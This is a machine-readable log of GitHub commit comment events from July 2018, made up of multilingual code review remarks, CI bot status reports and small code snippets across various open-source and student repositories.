{"id":"8039457986","type":"CommitCommentEvent","actor":{"login":"csomor"},"repo":{"name":"wxWidgets/wxWidgets"},"payload":{"comment":{"id":29891648,"position":null,"line":null,"path":null,"commit_id":"24dbe9775c1901b24a514ead28923227922b30af","created_at":"2018-07-30T18:25:41Z","updated_at":"2018-07-30T18:25:41Z","author_association":"CONTRIBUTOR","body":"I see the problem, it's about the \"look\" of a color or about the RGB color value. \r\nIf you open the horse.png and compare the two versions then you see that the sRGB colorspace version of wx corresponds to the way the horse should look. \r\nBut I understand your problem, if you rely on RGB pixel values then sRGB is not a good situation at least when we convert back to pixel colors... I'll think about where to best add the discrimination between the color spaces..."}},"created_at":"2018-07-30T18:25:41Z"}
{"id":"8039458698","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29891654,"position":null,"line":null,"path":null,"commit_id":"494294b728244d0f123ea856a1b7b2a8fb400f2c","created_at":"2018-07-30T18:25:49Z","updated_at":"2018-07-30T18:25:49Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-494294b728244d0f123ea856a1b7b2a8fb400f2c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T18:25:49Z"}
{"id":"8039460141","type":"CommitCommentEvent","actor":{"login":"TanmoyCtg"},"repo":{"name":"TanmoyCtg/PHP"},"payload":{"comment":{"id":29891658,"position":null,"line":null,"path":null,"commit_id":"b6e999e77f3d84f1158d984267e10f55c57c83c2","created_at":"2018-07-30T18:26:05Z","updated_at":"2018-07-30T18:26:05Z","author_association":"OWNER","body":"updated"}},"created_at":"2018-07-30T18:26:05Z"}
{"id":"8039460273","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891659,"position":13,"line":13,"path":"Part_5/main.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:26:07Z","updated_at":"2018-07-30T18:26:07Z","author_association":"NONE","body":"мысли вслух:\r\nстанции хранятся, поезда хранятся, роуты хранятся...\r\nа вагоны при отцеплении от поезда бесследно исчезают  ))"}},"created_at":"2018-07-30T18:26:07Z"}
{"id":"8039463634","type":"CommitCommentEvent","actor":{"login":"ringote"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29891669,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T18:26:41Z","updated_at":"2018-07-30T18:26:41Z","author_association":"NONE","body":"Então é para a versão 1.9 mesmo, mais obrigado vou tentar usar.\n\n\nHelio Gonzaga Santos Júnior\n\nDesenvolvedor Front-End\n\nContato: (11)94634-8975\n\n\n________________________________\nDe: Thiago Santos Pereira <notifications@github.com>\nEnviado: segunda-feira, 30 de julho de 2018 16:24\nPara: thiagosantos/Carrinho-Abandonado---Magento\nCc: Helio gonzaga; Mention\nAssunto: Re: [thiagosantos/Carrinho-Abandonado---Magento] novos arquivos adicionados (fc1fce6)\n\n\n@ringote<https://github.com/ringote> a última versão que testei foi com a 1.9.0.1. Recomendo montar uma ambiente de desenvolvimento e testar esse modulo. Não funciona com a versão 2.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/thiagosantos/Carrinho-Abandonado---Magento/commit/fc1fce6e978e65cd20cdc14482e63049ffe58653#commitcomment-29891628>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AZmPoPkZxzneSTLx7yGuw0YojVwcdjIvks5uL09YgaJpZM4Vm6nN>.\n"}},"created_at":"2018-07-30T18:26:41Z"}
{"id":"8039464350","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891671,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-30T18:26:49Z","updated_at":"2018-07-30T18:26:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:26:49Z"}
{"id":"8039468700","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891675,"position":9,"line":9,"path":"Part_5/main.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:27:32Z","updated_at":"2018-07-30T18:27:32Z","author_association":"NONE","body":"будет гораздо правильней интерфейс сделать в объектном стиле"}},"created_at":"2018-07-30T18:27:32Z"}
{"id":"8039470673","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29891679,"position":24,"line":26,"path":"tests/TicTacToeTest.php","commit_id":"2c4600804ea278039e6818b2183ec7fe284f2537","created_at":"2018-07-30T18:27:52Z","updated_at":"2018-07-30T18:27:52Z","author_association":"NONE","body":"Right: `$marks = $this->createMarksArray`."}},"created_at":"2018-07-30T18:27:52Z"}
{"id":"8039470741","type":"CommitCommentEvent","actor":{"login":"thiagosantos"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29891680,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T18:27:53Z","updated_at":"2018-07-30T18:27:53Z","author_association":"OWNER","body":"Que ótimo, recomendo você testar em um ambiente de desenvolvimento antes de por em produção."}},"created_at":"2018-07-30T18:27:53Z"}
{"id":"8039471463","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891683,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-30T18:28:00Z","updated_at":"2018-07-30T18:28:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:28:00Z"}
{"id":"8039472433","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29891687,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-30T18:28:11Z","updated_at":"2018-07-30T18:28:11Z","author_association":"MEMBER","body":"The main divergence between libretro AICA code and the upstream code is that I backported this from MAME -\r\n\r\nhttps://github.com/libretro/reicast-emulator/commit/7cd7e344090f2eebee3e427caabf415477eada29#diff-8f12bb63eb93624375e342bc81b63f01\r\n\r\nhttps://github.com/libretro/reicast-emulator/commit/7cd7e344090f2eebee3e427caabf415477eada29#diff-8f12bb63eb93624375e342bc81b63f01\r\n\r\nhttps://github.com/libretro/reicast-emulator/commit/ebc1b664bba6d3ab11e7e3932951a2ffe0987468#diff-8f12bb63eb93624375e342bc81b63f01\r\n\r\nYou might want to see if this is worthwhile or not, and whether or not I even backported it right. I think with those changes in master, I could probably make the code nearly identical to what you have in your branch right now (apart from the custom libretro-only WriteSample implementation, that is)."}},"created_at":"2018-07-30T18:28:11Z"}
{"id":"8039473253","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891689,"position":9,"line":9,"path":"Part_5/main.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:28:19Z","updated_at":"2018-07-30T18:28:19Z","author_association":"NONE","body":"минимально, что можно сделать, чтбы это было похоже на рабочую программу:\r\n\r\n1)  обернуть все методы, которые ты определил в `main.rb` в какой-нибудь класс, к примеру `class Main`\r\n2) добавить в класс `Main` какую-то \"входную точку\", к примеру метод `run`\r\n3) все остальные методы класса поместить в `private`\r\n4) уже после тела класса вызвать что-нибудь типа `main = Main.new` ну и далее `main.run`\r\n5) после этого уже метод `run` пусть у тебя обращается ко всем остальным методам класса... ну к примеру вызывает приватный метод `main_menu` в который ты уберешь свою петлю `loop do` (сейчас она как-то болтается не то что не в классе, даже не в методе :) )\r\n\r\nесли ты сделаешь хотя бы эти пункты - уже будет большой шаг вперед )))"}},"created_at":"2018-07-30T18:28:19Z"}
{"id":"8039476063","type":"CommitCommentEvent","actor":{"login":"Devoxin"},"repo":{"name":"Terminal/Discord_Fork"},"payload":{"comment":{"id":29891693,"position":null,"line":null,"path":null,"commit_id":"1df8c66ee0de03dc53e901a6733740c325f44406","created_at":"2018-07-30T18:28:46Z","updated_at":"2018-07-30T18:28:46Z","author_association":"CONTRIBUTOR","body":"gross"}},"created_at":"2018-07-30T18:28:46Z"}
{"id":"8039476873","type":"CommitCommentEvent","actor":{"login":"gellys"},"repo":{"name":"gellys/curso-javascript-ninja"},"payload":{"comment":{"id":29891695,"position":34,"line":34,"path":"challenge-09/challenge-09.js","commit_id":"51ae15ed8a34ae2ddd1012799f7881ae3d89deb2","created_at":"2018-07-30T18:28:53Z","updated_at":"2018-07-30T18:28:53Z","author_association":"OWNER","body":"function myFunction2() {\r\n\tvar number1 = 10;\r\n    var number2 = 20;\r\n    \r\n\tvar sum = function sum() {\r\n        return number1 + number2;\r\n    };\r\n\tconsole.log( 'A soma de 10 e 20 é igual a', sum ? sum() : undefined );\r\n\treturn sum();\r\n}"}},"created_at":"2018-07-30T18:28:53Z"}
{"id":"8039478107","type":"CommitCommentEvent","actor":{"login":"ringote"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29891699,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T18:29:06Z","updated_at":"2018-07-30T18:29:06Z","author_association":"NONE","body":"Isso mesmo cara, Estou criando um produto e ainda vai para desenvolvimento, Estou na documentação ainda.\n\n\nHelio Gonzaga Santos Júnior\n\nDesenvolvedor Front-End\n\nContato: (11)94634-8975\n\n\n________________________________\nDe: Thiago Santos Pereira <notifications@github.com>\nEnviado: segunda-feira, 30 de julho de 2018 16:27\nPara: thiagosantos/Carrinho-Abandonado---Magento\nCc: Helio gonzaga; Mention\nAssunto: Re: [thiagosantos/Carrinho-Abandonado---Magento] novos arquivos adicionados (fc1fce6)\n\n\nQue ótimo, recomendo você testar em um ambiente de desenvolvimento antes de por em produção.\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/thiagosantos/Carrinho-Abandonado---Magento/commit/fc1fce6e978e65cd20cdc14482e63049ffe58653#commitcomment-29891680>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AZmPoFncFRe8bB4a-GsFNMAHPgyg-zCIks5uL1ApgaJpZM4Vm6nN>.\n"}},"created_at":"2018-07-30T18:29:06Z"}
{"id":"8039478814","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891701,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-30T18:29:14Z","updated_at":"2018-07-30T18:29:14Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:29:14Z"}
{"id":"8039480859","type":"CommitCommentEvent","actor":{"login":"AndreyParkh"},"repo":{"name":"AndreyParkh/level-up-homeworks"},"payload":{"comment":{"id":29891706,"position":29,"line":29,"path":"public/views/css/homework-1/css/homework.css","commit_id":"bf1bcb8df9000aa7e401dfda363571f30d868f98","created_at":"2018-07-30T18:29:35Z","updated_at":"2018-07-30T18:29:35Z","author_association":"OWNER","body":"ааааа"}},"created_at":"2018-07-30T18:29:35Z"}
{"id":"8039480981","type":"CommitCommentEvent","actor":{"login":"lucko"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":29891707,"position":46,"line":46,"path":"src/main/java/org/spongepowered/api/event/permission/SubjectDataUpdateEvent.java","commit_id":"b909c8c30a37d0ee9dc9205bce23ed5dfc54faaf","created_at":"2018-07-30T18:29:37Z","updated_at":"2018-07-30T18:29:37Z","author_association":"MEMBER","body":"Reasoning was explained in the PR. (https://github.com/SpongePowered/SpongeAPI/pull/1627)"}},"created_at":"2018-07-30T18:29:37Z"}
{"id":"8039483841","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"GLexx909/thinknetica"},"payload":{"comment":{"id":29891715,"position":9,"line":9,"path":"Part_5/main.rb","commit_id":"5b0d69d025f52ce60cf33b5065901409418b949f","created_at":"2018-07-30T18:30:09Z","updated_at":"2018-07-30T18:30:09Z","author_association":"NONE","body":"что еще хорошо бы сделать, так это разбить код на методы меньшего размера (особенно пугает твоя \"главная петля\")\r\nразбиение же позволит сделать код более читаемым и при правильном подходе позволит избавиться от вложенных циклов и вложеных кондишен-блоков (`if...else`  или `case...when`)"}},"created_at":"2018-07-30T18:30:09Z"}
{"id":"8039484371","type":"CommitCommentEvent","actor":{"login":"bobcat13"},"repo":{"name":"onhan/guess_number"},"payload":{"comment":{"id":29891717,"position":1,"line":15,"path":"guess.py","commit_id":"7e2186783ebb674c2a076637c53e6cdf1b37f341","created_at":"2018-07-30T18:30:14Z","updated_at":"2018-07-30T18:30:14Z","author_association":"NONE","body":"you need rename input() into raw_input() for correct working on python 2.7\r\n\r\nhttps://stackoverflow.com/questions/21122540/input-error-nameerror-name-is-not-defined"}},"created_at":"2018-07-30T18:30:14Z"}
{"id":"8039485624","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891720,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-30T18:30:26Z","updated_at":"2018-07-30T18:30:26Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:30:26Z"}
{"id":"8039490419","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891723,"position":92,"line":92,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:31:20Z","updated_at":"2018-07-30T18:31:20Z","author_association":"NONE","body":"These can be local variable.\r\n\r\nlocal domain=\"$1\"\r\n\r\nDid not check all of them, but a variable should be local if only used inside the scope of a function.\r\n\r\nA good example of non local variable in this script is how AFTER_FIRST_PATH is used. Otherwise the variable should be local."}},"created_at":"2018-07-30T18:31:20Z"}
{"id":"8039491816","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891727,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-30T18:31:36Z","updated_at":"2018-07-30T18:31:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:31:36Z"}
{"id":"8039491820","type":"CommitCommentEvent","actor":{"login":"gellys"},"repo":{"name":"gellys/curso-javascript-ninja"},"payload":{"comment":{"id":29891728,"position":49,"line":49,"path":"challenge-09/challenge-09.js","commit_id":"51ae15ed8a34ae2ddd1012799f7881ae3d89deb2","created_at":"2018-07-30T18:31:36Z","updated_at":"2018-07-30T18:31:36Z","author_association":"OWNER","body":"function myFunction3() {\r\n\tvar number1 = 40;\r\n\tvar number2 = 50;\r\n\tfunction sum() {\r\n        return number1 + number2;\r\n    };\r\n    console.log( 'A soma de 40 e 50 é igual a', sum() );\r\n    \r\n    console.log( 'Na função myFunction3, number1 é igual a', number1 );\r\n    \r\n    return sum();\r\n    \r\n}"}},"created_at":"2018-07-30T18:31:36Z"}
{"id":"8039492691","type":"CommitCommentEvent","actor":{"login":"thiagosantos"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29891730,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T18:31:45Z","updated_at":"2018-07-30T18:31:45Z","author_association":"OWNER","body":"Legal, boa sorte!"}},"created_at":"2018-07-30T18:31:45Z"}
{"id":"8039494445","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891735,"position":92,"line":92,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:32:06Z","updated_at":"2018-07-30T18:32:06Z","author_association":"NONE","body":"Applies to other functions as well."}},"created_at":"2018-07-30T18:32:06Z"}
{"id":"8039495438","type":"CommitCommentEvent","actor":{"login":"ringote"},"repo":{"name":"thiagosantos/Carrinho-Abandonado---Magento"},"payload":{"comment":{"id":29891738,"position":null,"line":null,"path":null,"commit_id":"fc1fce6e978e65cd20cdc14482e63049ffe58653","created_at":"2018-07-30T18:32:16Z","updated_at":"2018-07-30T18:32:16Z","author_association":"NONE","body":"Obrigado mano!\n\n\nHelio Gonzaga Santos Júnior\n\nDesenvolvedor Front-End\n\nContato: (11)94634-8975\n\n\n________________________________\nDe: Thiago Santos Pereira <notifications@github.com>\nEnviado: segunda-feira, 30 de julho de 2018 16:31\nPara: thiagosantos/Carrinho-Abandonado---Magento\nCc: Helio gonzaga; Mention\nAssunto: Re: [thiagosantos/Carrinho-Abandonado---Magento] novos arquivos adicionados (fc1fce6)\n\n\nLegal, boa sorte!\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub<https://github.com/thiagosantos/Carrinho-Abandonado---Magento/commit/fc1fce6e978e65cd20cdc14482e63049ffe58653#commitcomment-29891730>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AZmPoKWpZmY_4J-veQZt877HNTSo4Q40ks5uL1ESgaJpZM4Vm6nN>.\n"}},"created_at":"2018-07-30T18:32:16Z"}
{"id":"8039498201","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891749,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-30T18:32:46Z","updated_at":"2018-07-30T18:32:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:32:46Z"}
{"id":"8039498590","type":"CommitCommentEvent","actor":{"login":"jreznot"},"repo":{"name":"cuba-platform/cuba"},"payload":{"comment":{"id":29891750,"position":53,"line":53,"path":"modules/web/src/com/haulmont/cuba/web/gui/components/WebTreeDataGrid.java","commit_id":"1c8e97318555e7c70bddaa2f594f8926dff73deb","created_at":"2018-07-30T18:32:50Z","updated_at":"2018-07-30T18:32:50Z","author_association":"MEMBER","body":"Do not check hasSubscriptions before publishing event. It is not required. We use hasSubscribtions only to remove unused listeners from router"}},"created_at":"2018-07-30T18:32:50Z"}
{"id":"8039504604","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891762,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-30T18:33:57Z","updated_at":"2018-07-30T18:33:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:33:57Z"}
{"id":"8039505032","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29891763,"position":24,"line":26,"path":"tests/TicTacToeTest.php","commit_id":"2c4600804ea278039e6818b2183ec7fe284f2537","created_at":"2018-07-30T18:34:01Z","updated_at":"2018-07-30T18:34:01Z","author_association":"OWNER","body":"createMarksArray is not a method. I put it outside as a 'helper' just for testing purposes. Moreover I do not know the deep implementation of TestCase class or PHPUnit Framework. As I saw, by magic PHPUnit calls all methods I use as test methods."}},"created_at":"2018-07-30T18:34:01Z"}
{"id":"8039506617","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891767,"position":317,"line":317,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:34:19Z","updated_at":"2018-07-30T18:34:19Z","author_association":"NONE","body":"Rename \"FIND\" to something more meaningful like \"expect_event\" or \"matching\"."}},"created_at":"2018-07-30T18:34:19Z"}
{"id":"8039508246","type":"CommitCommentEvent","actor":{"login":"joewiz"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29891773,"position":null,"line":null,"path":null,"commit_id":"18d0e5e133e9a99fac4b532a9cd3aaf66752a526","created_at":"2018-07-30T18:34:37Z","updated_at":"2018-07-30T18:34:37Z","author_association":"MEMBER","body":"@vak2ve @WaxCylinderRevival Good eye and rapid analysis! I have a revision to the encoding guidelines in the works - I plan to have this committed tomorrow. "}},"created_at":"2018-07-30T18:34:37Z"}
{"id":"8039510063","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29891776,"position":null,"line":null,"path":null,"commit_id":"2c4600804ea278039e6818b2183ec7fe284f2537","created_at":"2018-07-30T18:34:58Z","updated_at":"2018-07-30T18:34:58Z","author_association":"NONE","body":"Oh. Make it a method. "}},"created_at":"2018-07-30T18:34:58Z"}
{"id":"8039510748","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29891780,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-30T18:35:07Z","updated_at":"2018-07-30T18:35:07Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-30T18:35:07Z"}
{"id":"8039512547","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"GoogleChromeLabs/ndb"},"payload":{"comment":{"id":29891784,"position":5,"line":20,"path":"node_debug_demon/preload.js","commit_id":"a91f619dd579be780cce3e3bdbf898010b398909","created_at":"2018-07-30T18:35:25Z","updated_at":"2018-07-30T18:35:25Z","author_association":"NONE","body":":tada:"}},"created_at":"2018-07-30T18:35:25Z"}
{"id":"8039514716","type":"CommitCommentEvent","actor":{"login":"PSRCode"},"repo":{"name":"compudj/lttng-tools-dev"},"payload":{"comment":{"id":29891790,"position":116,"line":116,"path":"tests/regression/tools/tracker/test_event_tracker","commit_id":"11caed7fd4b581de8c18d4216410fb97f19b573b","created_at":"2018-07-30T18:35:48Z","updated_at":"2018-07-30T18:35:48Z","author_association":"NONE","body":"Move this check inside the trace_${DOMAIN}_app functions since it is always done."}},"created_at":"2018-07-30T18:35:48Z"}
